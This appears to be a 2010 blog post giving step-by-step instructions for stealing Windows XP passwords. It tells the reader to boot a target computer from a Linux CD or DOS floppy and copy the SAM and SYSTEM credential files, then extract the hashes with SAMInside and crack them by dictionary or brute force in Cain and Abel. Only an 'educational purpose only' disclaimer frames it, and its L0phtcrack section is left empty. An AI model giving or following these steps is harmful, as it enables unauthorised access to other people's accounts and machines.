Friday, August 6, 2010

Hacking passwords by cracking SAM file in window XP

For educational purpose only. Crypto will never be held responsible for any damage that is caused by this information.

Window OS stores the passwords in Security Account Manager(SAM) file. In order to crack SAM file, first you need the SAM file of the machine who's password you wan to crack.
SAM file is located at following location if C:\ is your installation directory:
C:\WINDOWS\System32\Config

Now you maybe thinking that will be very easy to copy the SAM file by just right clicking on it and then copy it, but when you do so you will get an error "Cannot copy file is in use" etc.
SAM file is actually locked by OS to prevent from being copied. You can't even copy it from Admin account. So the only way to copy SAM file is by starting the machine/computer in such a away so that SAM file is not in use. Now this can be done in following two ways :

1. Booting the computer using Linux boot CD :
First you need a Linux boot CD. Search google about how to make Linux boot CD or click here. Now we need to change the settings in BIOS of the computer so that it boots from CD not hard drive. Now insert the CD in CD-Writer of computer and reboot the computer. Now if everything worked fine you will see that machine starts in Linux. Now you just need to insert a removable storage media like USB drive, pendrive or floppy disk and copy SAM file to it. SAM file will be easily copied because window is no more running on that machine. Be sure to get the SYSTEM file in the same directory as well, as some passwords are encrypted with keys from within that file.

2. Using MS-DOS startup/boot disk :
This method doesn’t require you to go looking for some software, or using special burning software. Just insert a floppy, right click on it in My Computer, and click on format floppy. When the menu appears, mark the box for “Create a MS-DOS startup boot disk”, and then click the start button. After you have made your disk, put this floppy drive in the machine from which u want to get SAM & restart the machine with the floppy disk still in it. Make sure you BIOS settings boot from the floppy drive before the hard-drive. When the computer boots, you should se a screen similar to that a command prompt. “A:>” is most likely the prompt you will see. First you need to change drives to the C drive(installation directory). This is done various ways on different computers using the following command. Type following command and hit enter.
cd C:

Next you will need to use the copy command to copy the SAM and SYSTEM files to other areas of the hard drive. The command is as follows:
Copy C:\WINDOWS\System32\Config\SAM C:

This will copy the SAM file to the C drive. You can save it to any drive.
Now in order to copy SYSTEM file use following command :
Copy C:\WINDOWS\System32\Config\SYSTEM C:

Next you need to rename these files. Type following command :
ren SAM CryptoSAM

The command, which will rename your SAM file to CryptoSAM. Now restart your computer without the boot disk in and start up windows. Boot the machine from Hard drive. Copy the these files from C: drive onto a floppy or in any other removable media like CD, pendrive, USB stick etc.
Note : You may have to zip the SYSTEM file because is pretty big if you want to copy it to a floppy.
The reason why we renamed the files is because when u copied and renamed the file, it did not get used by windows when you logged on.

So now we got the SAM file. Now lets start to crack it. The process of cracking is as following :
First we need to find the hashes in SAM file. We use a tool called SAMInside for it.
Install SAMInside. Run SAMInside and goto File menu and select first option or press CTRL+O ie. choose the "Import SAM" option. A dialog box will ask you to point it to the SAM file you wish to crack. If Syskey is enabled (most likely it will be) it will then ask you for the SYSTEM file too. Browse both files to SAMInside.
Once you have cracked Syskey and have the hashes export them to a PWDump file using the file menu in SAMInside and then use L0phtcrack or Cain and Able tool to crack the passwords.

For Cain the procedure is as following :
Run Cain and go to the "Cracker" tab. From here choose "LM & NTLM Hashes" in the left pane and then right click on the grid in the right pane and choose "Add to list." Now choose "Import Hashes from text file or SAM" and click next. Don't try to import the SAM you copied because if the target system was using Syskey Cain will not be able to crack it. Find the PWdump file you created with SAMInside and open it. From here it's as easy as holding down control, left clicking on the accounts you want to crack and then right clicking and choosing either "Start Dictionary Attack" or "Start Brute-Force Attack." A Dictionary attack uses the text file in "c:\Program Files\Cain\Wordlists\Wordlist.txt" to tell it what passwords to try, open that file in notepad and edit it if you want to add more words. The Brute-force method runs through all possible combinations of characters that you configure under the "Brute-Force Options" tab of the "Configure" menu. The Brute-force method can take days depending on the options you choose. Now all the attacker has to do is wait.

For l0phtcrack the procedure is:

Hop this helps you.

No comments:

Post a Comment